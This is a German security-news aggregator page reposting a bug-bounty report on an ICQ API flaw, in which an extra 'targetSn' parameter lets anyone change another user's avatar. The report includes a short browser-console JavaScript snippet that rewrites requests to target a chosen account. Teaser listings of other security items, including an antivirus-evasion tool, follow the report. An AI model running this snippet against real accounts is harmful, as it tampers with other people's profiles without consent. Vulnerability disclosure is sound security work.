1. Reverse Engineering >
  2. Sicherheitslücken >
  3. Mail.ru: [API] ICQ user's avatar can be manipulated remotely

ArabicEnglishFrenchGermanGreekItalianJapaneseKoreanPersianPolishPortugueseRussianSpanishTurkishVietnamese

Mail.ru: [API] ICQ user's avatar can be manipulated remotely


Exploits vom | Direktlink: vulners.com Nachrichten Bewertung


image
Description: При обращении к API методу установки аватара пользователя (https://ub.icq.net/files/api/v1.1/avatar/set) Можно передать дополнительный GET параметр: targetSn - с установленным UIN'ом любого пользователя Тем самым можем изменить аватарку у любого пользователя Steps To Reproduce: Открыть Web версию ICQ Вставляем в консоль браузера следующий код (Указав вместо UIN атакуемый аккаунт): ``` const XHR_OPEN = XMLHttpRequest.prototype.open; XMLHttpRequest.prototype.open = function (...args) { let url = new URL(args[1]) if (url.pathname === '/files/api/v1.1/avatar/set') { url.searchParams.set('targetSn', 'UIN') args[1] = url.toString() console.log(args[1]) } return XHR_OPEN.apply(this, args); } ``` 1. Заменить аватар пользователя Скринкаст: █████████ Impact Частичный доступ к управлению чужими аккаунтами (возможно уязвимость применима и к другим методам......
https://vulners.com/hackerone/H1:786745?utm_source=rss&utm_medium=rss&utm_campaign=rss

Externe Quelle mit kompletten Inhalt anzeigen


Zur Startseite von Team IT Security

➤ Weitere Beiträge von Team Security | IT Sicherheit

Mail.Ru Calendar Plugin bis 2.5.0.60 auf Atlassian Jira Create Calender month Name Cross Site Scripting

vom 258.49 Punkte ic_school_black_18dp
Es wurde eine problematische Schwachstelle in Mail.Ru Calendar Plugin bis 2.5.0.60 auf Atlassian Jira ausgemacht. Betroffen hiervon ist eine unbekannte Funktion der Datei MailRuCalendar.jspa#period/month der Komponente Create Calender. Durch das Beeinfluss

Mail.Ru Calendar Plugin bis 2.5.0.60 auf Atlassian Jira Create Calender month Name Cross Site Scripting

vom 258.49 Punkte ic_school_black_18dp
Es wurde eine problematische Schwachstelle in Mail.Ru Calendar Plugin bis 2.5.0.60 auf Atlassian Jira ausgemacht. Betroffen hiervon ist eine unbekannte Funktion der Datei MailRuCalendar.jspa#period/month der Komponente Create Calender. Durch das Beeinfluss

Discontinuing support for JSON-RPC and Global HTTP Batch Endpoints

vom 211.31 Punkte ic_school_black_18dp
Updated by Shilpa Kamalakar, Technical Program Manager We have invested heavily in our API and service infrastructure to improve performance and security and to add features developers need to build world-class APIs. As we make changes we must addres

Automatic API Attack Tool - Customizable API Attack Tool Takes An API Specification As An Input, Generates And Runs Attacks That Are Based On It As An Output

vom 184.64 Punkte ic_school_black_18dp
Imperva's customizable API attack tool takes an API specification as an input, and generates and runs attacks that are based on it as an output.The tool is able to parse an API specification and create fuzzing attack scenarios based on what is defined in the API spe

Advanced in-app billing: handling alternative purchase flows

vom 183.15 Punkte ic_school_black_18dp
Posted by Oscar Rodriguez, Developer Advocate When designing and developing an app or game, at some point you may ask yourself if you want to monetize it. If you choose to do so by selling products via Google Play, you will most likely have a store screen that shows available items for sale, and use the Google Play Billing Library to

10 things you might be doing wrong when using the SafetyNet Attestation API

vom 175.74 Punkte ic_school_black_18dp
Posted by Oscar Rodriguez, Developer Advocate The SafetyNet Attestation API helps you assess the security and compatibility of the Android environments in which your apps run. Since it was introduced in March 2015, many developers have successfully in

Secure and compliant APIs for a hybrid and multi-cloud world

vom 169.02 Punkte ic_school_black_18dp
APIs are everywhere. The broad proliferation of applications throughout enterprises often results in large silos of opaque processes and services, making it hard for IT to manage and govern APIs in a systematic way, and for development teams to gain vi

Introducing Android 9 Pie

vom 165.48 Punkte ic_school_black_18dp
Posted by Dave Burke, VP of Engineering After more than a year of development and months of testing by early adopters, we're ready to launch Android 9 Pie, the latest release of Android, to the world. Android 9 harnesses the power of machine learning to make your phone smarter, simpler, and tailored to you. Read all about the new consumer features here. For developers, Android 9 includes m

PMapper - A Tool For Quickly Evaluating IAM Permissions In AWS

vom 161.54 Punkte ic_school_black_18dp
A project to speed up the process of reviewing an AWS account's IAM configuration. Purpose The goal of the AWS IAM auth system is to apply and enforce access controls on actions and resources in AWS. This tool helps identify if the policies in place will ac

Phantom Evasion - Python AV Evasion Tool Capable To Generate FUD Executable Even With The Most Common 32 Bit Metasploit Payload (Exe/Elf/Dmg/Apk)

vom 157 Punkte ic_school_black_18dp
Phantom-Evasion is an interactive antivirus evasion tool written in python capable to generate (almost) FUD executable even with the most common 32 bit msfvenom payload (lower detection ratio with 64 bit payloads). The aim of this tool is to make antiviru

Phantom Evasion - Python AV Evasion Tool Capable To Generate FUD Executable Even With The Most Common 32 Bit Metasploit Payload (Exe/Elf/Dmg/Apk)

vom 157 Punkte ic_school_black_18dp
Phantom-Evasion is an interactive antivirus evasion tool written in python capable to generate (almost) FUD executable even with the most common 32 bit msfvenom payload (lower detection ratio with 64 bit payloads). The aim of this tool is to make antiviru

Local Privilege Escalation in Win32k.sys Through Indexed Color Palettes

vom 156.59 Punkte ic_school_black_18dp
This is the second in our series of Top 5 interesting cases from 2019. Each of these bugs has some element that sets them apart from the more than 1,000 advisories released by the program this year. Today’s blog looks a local privilege escalation in t

Team Security Diskussion über Mail.ru: [API] ICQ user's avatar can be manipulated remotely